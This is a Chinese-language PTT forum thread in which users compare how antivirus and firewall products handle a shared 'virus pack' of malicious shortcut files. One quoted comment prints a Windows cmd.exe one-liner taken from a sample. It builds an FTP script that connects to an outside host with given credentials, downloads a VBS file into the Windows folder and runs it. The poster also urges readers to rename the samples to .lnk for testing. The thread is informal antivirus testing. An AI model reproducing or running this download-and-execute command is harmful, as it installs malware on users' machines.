Re: [推薦] 病毒包又來了!!!
: --
: ※ 發信站: 批踢踢實業坊(ptt.cc)
: ◆ From: 59.112.10.194
: 推 pgpayton:D+ 預設情況下早已將windows重要的資料夾加入保護 01/30 13:06
: → pgpayton:未經授權的程序是不容許竄改的 防火牆沒必要關閉吧 01/30 13:10
: → pgpayton:因為Ftp.exe要往外連 會有提示 我測的結果是lnk都無效 01/30 13:11
: → pgpayton:不然請您把有效的lnk丟給我 01/30 13:12
: → miamodo:@@刺套跳蛋@@.download,更改副檔名為lnk 01/30 14:51
: → miamodo:查一下computer security plolicy內cmd.exe的規則… 01/30 14:51
: → miamodo:如果fd阻止t.t及link.vbs的創建,就不能測試了 01/30 14:51
: → miamodo:很久沒有使用defense wall了,不了解它在情形如何… 01/30 14:52
: → miamodo:以下是跳蛋其中一段 01/30 14:53
: → miamodo:%windir%\system32\cmd.exe 01/30 14:53
: → miamodo:/c echo open onehla.3322.org >t.t&echo 123>>t.t&echo 01/30 14:54
: → miamodo:get 1-1 %windir%\link.vbs>>t.t&echo bye>>t.t&ftp -s: 01/30 14:55
: → miamodo:t.t&del t.t&start %windir%\link.vbs& 01/30 14:55
: → miamodo:%windir%\system32\cmd.exe 01/30 14:56
: → miamodo:15-1645522239-1606980848-500_CLASSES 01/30 14:56
: → miamodo:Lucida Console 01/30 14:57
: → miamodo:其實也不必去run,在網址列輸入ftp:\\onehla.3322.org 01/30 14:59
: → miamodo:輸入username:123,password:123,也可下載.... 01/30 15:01
: 推 pgpayton:D+ fd預設根本沒設cmd.exe的規則 有設的話此病毒包的病毒 01/30 16:00
: → pgpayton:大部分都沒辦法執行 另外為啥要改副檔名? 我是指原本病毒 01/30 16:01
: → pgpayton:包的lnk檔 那些download檔 我點擊也都是沒任何事發生 01/30 16:03
: → pgpayton:download檔我就沒每個試 01/30 16:04
: → miamodo:computer security plolicy->AD 01/30 16:34
: → miamodo:原Po已說過download檔是lnk檔.... 01/30 16:35
: 推 pgpayton:AD沒設cmd的規則阿 另外要改副檔名才能執行病毒 那就跟 01/30 16:53
: → pgpayton:防毒軟體的隔離 差不多了 也就是使用者誤點也無法執行 01/30 16:54
: → miamodo:如果您未曾設cmd規則,在執行lnk檔時,在paranoid模式下 01/30 17:10
: → miamodo:應會出現explorer.exe excute cmd.exe的詢問視窗 01/30 17:11
: → miamodo:所以您說d+無反應,個人才會不解.... 01/30 17:12
: → miamodo:另外您說的沒錯副檔名download是不能直接在雙擊執行的.. 01/30 17:12
: 推 TypeZero:這是因為google瀏覽器會自動改副檔名... 01/30 17:23
: 推 pgpayton:explorer.exe excute cmd.exe? 我是執行lnk檔 並不是cmd 01/30 17:24
: → pgpayton:如果改成無法執行的副檔名 那也就不能怪防毒的偵測率低弱 01/30 17:25
: → miamodo:謝謝T大的說明... 01/30 17:27
: 推 pgpayton:也不是說D+無反應 因為explorer.exe是執行某檔案D+會出現 01/30 17:28
: → pgpayton:的正常提示 我應該改成D+無偵測到可疑行為 01/30 17:29
: → miamodo:謝謝p大的說明,這病毒包讓我又學到很多東西,感謝... 01/30 17:32
: → miamodo:為了安全起見建議p大將cmd,ntvdm,?script等列入黑名單.. 01/30 17:38
: 推 pgpayton:感謝你的好意 不過我電腦並沒裝comodo.. 01/30 17:41
: 推 pgpayton:另外請教T大為何有的會改成無效的副檔名? 有的不會? 01/30 18:03
防毒軟體的偵測應該跟副檔名沒有關係吧...
主要是判定該檔案具有威脅性
再說,竟然有防毒軟體可以偵測,為什麼某些防毒軟體不能
希望不要再為特定防毒軟體過度保護,這樣不能讓一個防毒廠商成長
只是助長病毒
讓病毒更加氾濫,使用者也不一定要一直用同一套防毒軟體
雖然說升級的費用較便宜,但是如果病毒造成無法挽回的後果那就糟了
比如說阿宅珍藏的釘宮理惠配音的動畫被刪光(不要在意那四個字= =)
類似這樣的事情多得不償失呀!
所以防毒軟體要做到的是萬全的防護,而不是針對特定副檔名的防護
因為如果分成兩段式,利用一個exe檔去指令執行某個亂七八糟副檔名的檔案
這樣不就中鏢了?
我個人認為應該是沒有這樣的問題,希望有人能幫忙測試那些效能低落的防毒軟體
將我發的病毒包*.download檔案,利用批量重新命名改成*.lnk
測試看看是否有改變,基本上應該是不會改變的
lnk連結失效,但是kis還是可以偵測,所以這應該跟失不失效沒關係
--
※ 發信站: 批踢踢實業坊(ptt.cc)
◆ From: 114.46.167.126
推
01/30 19:21, , 1F
01/30 19:21, 1F
※ 編輯: TypeZero 來自: 114.46.167.126 (01/30 19:33)
※ 編輯: TypeZero 來自: 114.46.167.126 (01/30 19:33)
推
01/30 19:45, , 2F
01/30 19:45, 2F
→
01/30 19:49, , 3F
01/30 19:49, 3F
→
01/30 19:51, , 4F
01/30 19:51, 4F
推
01/30 20:02, , 5F
01/30 20:02, 5F
→
01/30 20:04, , 6F
01/30 20:04, 6F
推
01/30 20:48, , 7F
01/30 20:48, 7F
→
01/30 20:49, , 8F
01/30 20:49, 8F
→
01/30 20:49, , 9F
01/30 20:49, 9F
→
01/30 20:50, , 10F
01/30 20:50, 10F
→
01/30 20:51, , 11F
01/30 20:51, 11F
推
01/31 02:20, , 12F
01/31 02:20, 12F
→
01/31 02:21, , 13F
01/31 02:21, 13F
→
01/31 02:22, , 14F
01/31 02:22, 14F
→
01/31 02:23, , 15F
01/31 02:23, 15F
→
01/31 02:25, , 16F
01/31 02:25, 16F
討論串 (同標題文章)